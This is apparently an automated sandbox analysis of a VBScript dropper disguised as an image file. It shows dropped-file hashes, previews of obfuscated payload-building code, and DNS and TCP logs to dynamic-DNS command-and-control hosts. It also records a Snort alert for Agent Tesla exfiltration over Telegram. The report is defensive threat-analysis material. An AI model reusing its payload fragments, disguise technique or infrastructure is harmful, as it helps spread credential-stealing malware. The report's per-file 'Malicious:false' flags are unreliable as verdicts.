                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                      Malicious:false
                      Preview:@...e...........................................................

                      C:\Users\user\AppData\Local\Temp\Bichloride.vbs

                      Download File
                      Process:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):832829
                      Entropy (8bit):5.0885712239317815
                      Encrypted:false
                      SSDEEP:12288:cJ17c8wKTCYUZHz+ri3+U1yGgRfEDn5XJakQUEGkmKs7gPZ8PNMnkbV3Bu5qc:M7/AEi3o0n5ILsLbVxuN
                      MD5:4C8882314A2E1B18655660C964A5EBF6
                      SHA1:5FA1E07C13863BEC4C07FFEEE7770D8597ADC3FB
                      SHA-256:6C7CC2AFF7208B2C622C28BED2101EC371FAE91B6981568515842B9269DFFD0E
                      SHA-512:E00575BAB08F2C1AD8942EFAE3ED9AF5ABDD5439493C11987091BCD955942C19ED6C213DE1B1DEA70EF8519BF16996FF4571A3A5B6FD1F4FFC1CC1A61369D9FF
                      Malicious:false
                      Preview:Tr8 = Tr8 & "6wLTqusC"..Tr8 = Tr8 & "JDqB7QADAA"..Tr8 = Tr8 & "BxAZt"..Tr8 = Tr8 & "xAZuL"..Tr8 = Tr8 & "VCQI6wJzbHE"..Tr8 = Tr8 & "Bm4t8JATrA"..Tr8 = Tr8 & "qkncQG"..Tr8 = Tr8 & "bievrAp"..Tr8 = Tr8 & "kGcQGbg"..Tr8 = Tr8 & "cOcAAAA"..Tr8 = Tr8 & "cQGb6wL"..Tr8 = Tr8 & "I11PrAtYFc"..Tr8 = Tr8 & "QGbak"..Tr8 = Tr8 & "DrArrE6wIDR"..Tr8 = Tr8 & "HEBm+sC"..Tr8 = Tr8 & "xm6J63"..Tr8 = Tr8 & "EBm+s"..Tr8 = Tr8 & "CUnnHgwABA"..Tr8 = Tr8 & "AAAABAAcQG"..Tr8 = Tr8 & "b6wL+"..Tr8 = Tr8 & "roHDA"..Tr8 = Tr8 & "AEAAOs"..Tr8 = Tr8 & "C8kBxAZtTcQ"..Tr8 = Tr8 & "Gb6wJIMIn"..Tr8 = Tr8 & "r6wLM+esC"..Tr8 = Tr8 & "2EWJu"..Tr8 = Tr8 & "wQBAAB"..Tr8 = Tr8 & "xAZvrA"..Tr8 = Tr8 & "vXtgcMEAQAA"..Tr8 = Tr8 & "6wJl5"..Tr8 = Tr8 & "OsCsXlT"..Tr8 = Tr8 & "6wKMRXEB"..Tr8 = Tr8 & "m2r/c"..Tr8 = Tr8 & "QGbcQ"..Tr8 = Tr8 & "Gbg8I"..Tr8 = Tr8 & "F6wLi"..Tr8 = Tr8 & "73EBmzH"..Tr8 = Tr8 & "2cQGbcQGb"..Tr8 = Tr8 & "McnrAky"..Tr8 = Tr8 & "ZcQGbixr"..Tr8 = Tr8 & "rAheQ6wJVEE"..Tr8 = Tr8 & "HrAgPc6wLrc"..Tr8 = Tr8 & "Dk

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2c4howsr.nhi.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5elcf2ed.d41.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ibfztpdx.ynr.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mufoeags.irm.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      \Device\ConDrv

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):30
                      Entropy (8bit):3.964735178725505
                      Encrypted:false
                      SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                      MD5:9F754B47B351EF0FC32527B541420595
                      SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                      SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                      SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                      Malicious:false
                      Preview:NordVPN directory not found!..

                      Static File Info

                      General

                      File type:ASCII text, with CRLF line terminators
                      Entropy (8bit):5.08517872813569
                      TrID:
                        File name:IMG_2022028022-0120.vbs
                        File size:837420
                        MD5:752418aa9de96e0fc941ae1e7e33c906
                        SHA1:bb67df2d8a4b525b42211630386e4b51a97255a3
                        SHA256:cdce0391762117cc926a2131b5e0ec7724b69d1224dbabc7a3f351dfebf9b9bf
                        SHA512:930b079189279aa377bca9b64471ecd0956522715e89eebc1a818166bbd6d309491ec6bd8714d4cc5db34ca824627b2e087e79f7b1d9ad7033c38dfd0d56c3c7
                        SSDEEP:12288:S6SeO/ZNca+0J/FEituFvSnQ+7XPwVr2rhs+MDRpmrtVUBM/LB2g+ZImPkQN3BSq:EKpfTGVKaQNxSq
                        TLSH:1E05A06394151590870DADAE884ADDF8CCA1021EB513241607B0BB7E2F6F8E8BDDB5DF
                        File Content Preview:Un9 = Un9 & "cQGbcQGbge0"..Un9 = Un9 & "AAwAAcQGb6w"..Un9 = Un9 & "LhDItUJAjrA"..Un9 = Un9 & "rL/cQGbi3"..Un9 = Un9 & "wkBOsCqLX"..Un9 = Un9 & "rAmpUietxAZ"..Un9 = Un9 & "txAZuBw5wAA"..Un9 = Un9 & "ABxAZtx"..Un9 = Un9 & "AZtTc"..Un9 = Un9 & "QGb6wJJP"..Un

                        File Icon

                        Icon Hash:e8d69ece869a9ec4

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        192.168.11.20149.154.167.220498814432851779 11/28/22-20:47:47.307107TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49881443192.168.11.20149.154.167.220

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 28, 2022 20:45:13.139298916 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.148035049 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.148372889 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.148950100 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.157700062 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.298326969 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.298404932 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.298463106 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.298548937 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.298604965 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.298662901 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.298672915 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.298722029 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.298753977 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.298810005 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.298831940 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.298907042 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.298962116 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.298998117 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.299035072 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.299051046 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.299118042 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.299124002 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.299205065 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.299315929 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.336026907 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336102009 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336159945 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336214066 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336272001 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336381912 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336391926 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.336474895 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336536884 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336594105 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336647987 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336703062 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336709976 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.336782932 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336816072 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.336863041 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336895943 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.336952925 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337018013 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337042093 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337090015 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337107897 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337177038 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337193966 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337253094 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337275982 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337438107 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337439060 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337460041 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337543964 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337605953 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337665081 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337693930 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337734938 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337775946 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337846994 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.338020086 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.375611067 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.375674963 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.375912905 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.376435995 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376504898 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376560926 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376617908 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376627922 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.376687050 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.376707077 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376768112 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.376789093 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376867056 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376921892 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376956940 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.376998901 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377038002 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377080917 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377118111 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377168894 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377234936 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377270937 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377310038 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377326965 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377397060 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377403021 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377477884 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377484083 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377557993 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377583027 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377641916 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377645016 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377722979 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377727032 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377801895 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377808094 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377882004 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377907038 CET4981180192.168.11.20172.67.169.218

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 28, 2022 20:45:12.923213005 CET5488353192.168.11.201.1.1.1
                        Nov 28, 2022 20:45:13.115240097 CET53548831.1.1.1192.168.11.20
                        Nov 28, 2022 20:45:16.157552958 CET5980753192.168.11.201.1.1.1
                        Nov 28, 2022 20:45:16.806633949 CET5593253192.168.11.201.1.1.1
                        Nov 28, 2022 20:45:17.799076080 CET5205153192.168.11.201.1.1.1
                        Nov 28, 2022 20:45:17.912461042 CET53520511.1.1.1192.168.11.20
                        Nov 28, 2022 20:45:20.153374910 CET6073953192.168.11.201.1.1.1
                        Nov 28, 2022 20:45:20.169534922 CET53607391.1.1.1192.168.11.20
                        Nov 28, 2022 20:46:20.001605988 CET6106553192.168.11.201.1.1.1
                        Nov 28, 2022 20:46:20.117671967 CET53610651.1.1.1192.168.11.20
                        Nov 28, 2022 20:46:22.374329090 CET4958353192.168.11.201.1.1.1
                        Nov 28, 2022 20:46:22.390732050 CET53495831.1.1.1192.168.11.20
                        Nov 28, 2022 20:47:05.561343908 CET6182453192.168.11.201.1.1.1
                        Nov 28, 2022 20:47:06.608068943 CET5638953192.168.11.201.1.1.1
                        Nov 28, 2022 20:47:23.534564972 CET6192953192.168.11.201.1.1.1
                        Nov 28, 2022 20:47:23.645587921 CET53619291.1.1.1192.168.11.20
                        Nov 28, 2022 20:47:25.891343117 CET5129153192.168.11.201.1.1.1
                        Nov 28, 2022 20:47:25.907448053 CET53512911.1.1.1192.168.11.20
                        Nov 28, 2022 20:47:47.203263998 CET5536253192.168.11.201.1.1.1
                        Nov 28, 2022 20:47:47.212587118 CET53553621.1.1.1192.168.11.20
                        Nov 28, 2022 20:48:28.473647118 CET4949553192.168.11.201.1.1.1
                        Nov 28, 2022 20:48:28.608522892 CET53494951.1.1.1192.168.11.20
                        Nov 28, 2022 20:48:30.845830917 CET5403253192.168.11.201.1.1.1
                        Nov 28, 2022 20:48:30.866609097 CET53540321.1.1.1192.168.11.20
                        Nov 28, 2022 20:49:33.397072077 CET5951553192.168.11.201.1.1.1
                        Nov 28, 2022 20:49:33.510668039 CET53595151.1.1.1192.168.11.20
                        Nov 28, 2022 20:49:35.754528999 CET5317153192.168.11.201.1.1.1
                        Nov 28, 2022 20:49:35.766369104 CET53531711.1.1.1192.168.11.20
                        Nov 28, 2022 20:50:36.851831913 CET5036953192.168.11.201.1.1.1
                        Nov 28, 2022 20:50:36.982223034 CET53503691.1.1.1192.168.11.20
                        Nov 28, 2022 20:50:39.225626945 CET5032053192.168.11.201.1.1.1
                        Nov 28, 2022 20:50:39.238917112 CET53503201.1.1.1192.168.11.20
                        Nov 28, 2022 20:51:36.489748001 CET6480853192.168.11.201.1.1.1
                        Nov 28, 2022 20:51:36.603502989 CET53648081.1.1.1192.168.11.20
                        Nov 28, 2022 20:51:38.846743107 CET6319253192.168.11.201.1.1.1
                        Nov 28, 2022 20:51:38.862339020 CET53631921.1.1.1192.168.11.20
                        Nov 28, 2022 20:52:36.570648909 CET5456953192.168.11.201.1.1.1
                        Nov 28, 2022 20:52:36.688539982 CET53545691.1.1.1192.168.11.20
                        Nov 28, 2022 20:52:39.084089041 CET6019553192.168.11.201.1.1.1
                        Nov 28, 2022 20:52:39.096400976 CET53601951.1.1.1192.168.11.20

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Nov 28, 2022 20:45:12.923213005 CET192.168.11.201.1.1.10x74b7Standard query (0)sinopbisikletkiralama.comA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:45:16.157552958 CET192.168.11.201.1.1.10xd31dStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:45:16.806633949 CET192.168.11.201.1.1.10xb0bdStandard query (0)f65kcg.am.files.1drv.comA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:45:17.799076080 CET192.168.11.201.1.1.10xddb9Standard query (0)backupfrontmanny.duckdns.orgA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:45:20.153374910 CET192.168.11.201.1.1.10xf365Standard query (0)myfrontmannyfive.ddns.netA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:46:20.001605988 CET192.168.11.201.1.1.10xf425Standard query (0)backupfrontmanny.duckdns.orgA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:46:22.374329090 CET192.168.11.201.1.1.10x6a53Standard query (0)myfrontmannyfive.ddns.netA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:47:05.561343908 CET192.168.11.201.1.1.10xfa4bStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:47:06.608068943 CET192.168.11.201.1.1.10x5011Standard query (0)f64nqg.am.files.1drv.comA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:47:23.534564972 CET192.168.11.201.1.1.10xe2f0Standard query (0)backupfrontmanny.duckdns.orgA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:47:25.891343117 CET192.168.11.201.1.1.10xa39dStandard query (0)myfrontmannyfive.ddns.netA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:47:47.203263998 CET192.168.11.201.1.1.10x54dcStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:48:28.473647118 CET192.168.11.201.1.1.10xbbf9Standard query (0)backupfrontmanny.duckdns.orgA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:48:30.845830917 CET192.168.11.201.1.1.10xdc6bStandard query (0)myfrontmannyfive.ddns.netA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:49:33.397072077 CET192.168.11.201.1.1.10xa92eStandard query (0)backupfrontmanny.duckdns.orgA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:49:35.754528999 CET192.168.11.201.1.1.10x66f3Standard query (0)myfrontmannyfive.ddns.netA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:50:36.851831913 CET192.168.11.201.1.1.10x912aStandard query (0)backupfrontmanny.duckdns.orgA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:50:39.225626945 CET192.168.11.201.1.1.10x2109Standard query (0)myfrontmannyfive.ddns.netA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:51:36.489748001 CET192.168.11.201.1.1.10x8d94Standard query (0)backupfrontmanny.duckdns.orgA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:51:38.846743107 CET192.168.11.201.1.1.10xd5daStandard query (0)myfrontmannyfive.ddns.netA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:52:36.570648909 CET192.168.11.201.1.1.10x4d71Standard query (0)backupfrontmanny.duckdns.orgA (IP address)IN (0x0001)false
                        Nov 28, 2022 20:52:39.084089041 CET192.168.11.201.1.1.10x7cbeStandard query (0)myfrontmannyfive.ddns.netA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Nov 28, 2022 20:45:13.115240097 CET1.1.1.1192.168.11.200x74b7No error (0)sinopbisikletkiralama.com172.67.169.218A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:45:13.115240097 CET1.1.1.1192.168.11.200x74b7No error (0)sinopbisikletkiralama.com104.21.95.74A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:45:16.167279005 CET1.1.1.1192.168.11.200xd31dNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                        Nov 28, 2022 20:45:16.870518923 CET1.1.1.1192.168.11.200xb0bdNo error (0)f65kcg.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                        Nov 28, 2022 20:45:16.870518923 CET1.1.1.1192.168.11.200xb0bdNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                        Nov 28, 2022 20:45:17.912461042 CET1.1.1.1192.168.11.200xddb9No error (0)backupfrontmanny.duckdns.org84.38.134.104A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:45:20.169534922 CET1.1.1.1192.168.11.200xf365No error (0)myfrontmannyfive.ddns.net37.0.14.209A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:46:20.117671967 CET1.1.1.1192.168.11.200xf425No error (0)backupfrontmanny.duckdns.org84.38.134.104A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:46:22.390732050 CET1.1.1.1192.168.11.200x6a53No error (0)myfrontmannyfive.ddns.net37.0.14.209A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:47:05.572294950 CET1.1.1.1192.168.11.200xfa4bNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                        Nov 28, 2022 20:47:06.684719086 CET1.1.1.1192.168.11.200x5011No error (0)f64nqg.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                        Nov 28, 2022 20:47:06.684719086 CET1.1.1.1192.168.11.200x5011No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                        Nov 28, 2022 20:47:23.645587921 CET1.1.1.1192.168.11.200xe2f0No error (0)backupfrontmanny.duckdns.org84.38.134.104A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:47:25.907448053 CET1.1.1.1192.168.11.200xa39dNo error (0)myfrontmannyfive.ddns.net37.0.14.209A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:47:47.212587118 CET1.1.1.1192.168.11.200x54dcNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:48:28.608522892 CET1.1.1.1192.168.11.200xbbf9No error (0)backupfrontmanny.duckdns.org84.38.134.104A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:48:30.866609097 CET1.1.1.1192.168.11.200xdc6bNo error (0)myfrontmannyfive.ddns.net37.0.14.209A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:49:33.510668039 CET1.1.1.1192.168.11.200xa92eNo error (0)backupfrontmanny.duckdns.org84.38.134.104A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:49:35.766369104 CET1.1.1.1192.168.11.200x66f3No error (0)myfrontmannyfive.ddns.net37.0.14.209A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:50:36.982223034 CET1.1.1.1192.168.11.200x912aNo error (0)backupfrontmanny.duckdns.org84.38.134.104A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:50:39.238917112 CET1.1.1.1192.168.11.200x2109No error (0)myfrontmannyfive.ddns.net37.0.14.209A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:51:36.603502989 CET1.1.1.1192.168.11.200x8d94No error (0)backupfrontmanny.duckdns.org84.38.134.104A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:51:38.862339020 CET1.1.1.1192.168.11.200xd5daNo error (0)myfrontmannyfive.ddns.net37.0.14.209A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:52:36.688539982 CET1.1.1.1192.168.11.200x4d71No error (0)backupfrontmanny.duckdns.org84.38.134.104A (IP address)IN (0x0001)false
                        Nov 28, 2022 20:52:39.096400976 CET1.1.1.1192.168.11.200x7cbeNo error (0)myfrontmannyfive.ddns.net37.0.14.209A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • api.telegram.org
                        • sinopbisikletkiralama.com

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:20:44:26
                        Start date:28/11/2022
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs"
                        Imagebase:0x7ff677550000
                        File size:170496 bytes
                        MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Target ID:3
                        Start time:20:44:31
                        Start date:28/11/2022
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
